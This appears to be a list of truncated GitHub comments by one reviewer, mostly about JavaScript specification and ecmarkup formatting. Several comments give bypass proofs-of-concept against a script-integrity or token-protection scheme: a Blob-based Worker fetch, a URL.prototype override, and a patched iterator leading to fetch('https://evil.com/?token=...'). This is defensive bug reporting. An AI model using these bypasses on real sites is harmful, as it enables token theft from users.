Kevin Gibbons

Per plenary, built-in async functions will continue to have Function.prototype as their prototype.

You need to care about regular workers, not just service workers: ```js new Worker(URL.createObjectURL(new Blob([ `fetch('http://localhost:3000/assets/foo-AAAAAAAA.js').then(console.log)` ], {type: 'application/javascript'}))) ``` Same threat as iframes: workers get unmodified copies of the...

Second example in the OP still works: ```js Object.defineProperty(URL.prototype, 'pathname', { value: () => '' }); await fetch('/assets/foo-AAAAAAAA.js'); ``` Also you're still trusting attacker-controlled values. For example, I think something...

At least one more bug: ```js [][Symbol.iterator]().__proto__.next = function() { if (this._doneFirst) return { done: true }; this._doneFirst = true; return { done: false, value: 'evil.com' }; } fetch('https://evil.com/?token=_placeholder_'); ```...

Hmm. I agree we need better formatting for large records, but I'm not totally convinced by the approach of preserving whitespace - I think I'd like to handle them explicitly....

Yeah, that's what I meant by "handle them explicitly" (though it would be a little more complicated than that - you only want to expand a record at the end...

I don't know that I deliberately rely on whitespace collapsing; rather it's just that it's (kind of) HTML, and I assume whitespace always collapses when writing HTML. Even if we...

Fair point about lists. I'm still not sure about fully general whitespace-sensitivity, though. I guess my actual opinion is, I think explicitly supporting multi-line records is sufficient for the use...

The error for `IfAbruptCloseAsyncIterator` is because you are already introducing it as an AO, which automatically defines the term, but you are also putting a `` around the term. The...

We've found that adding explicit support for subclassing built-ins (in the sense of adding hooks like `Symbol.species` or having methods defer to other methods like how the `Set` constructor calls...